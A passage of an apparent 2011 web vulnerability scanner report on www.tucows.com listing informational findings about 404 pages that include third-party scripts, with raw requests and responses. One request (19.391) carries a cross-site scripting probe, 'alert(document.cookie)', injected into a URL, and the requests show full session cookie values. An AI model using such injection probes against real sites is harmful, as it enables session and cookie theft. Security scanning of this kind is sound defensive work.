User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.380. http://www.tucows.com/images/newassets/includes/js/xdocsize.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.381. http://www.tucows.com/images/newassets/includes/js/yetii.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.382. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.383. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.384. http://www.tucows.com/images/newassets/javascript:void(null)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.385. http://www.tucows.com/images/newassets/lostpass.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.386. http://www.tucows.com/images/newassets/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.387. http://www.tucows.com/images/newassets/safesearchtoggle.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.388. http://www.tucows.com/images/newassets/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.389. http://www.tucows.com/images/newassets/sitemap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.390. http://www.tucows.com/images/newassets/terms.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.391. http://www.tucows.com/images/newassets/warningcow200.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.392. http://www.tucows.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
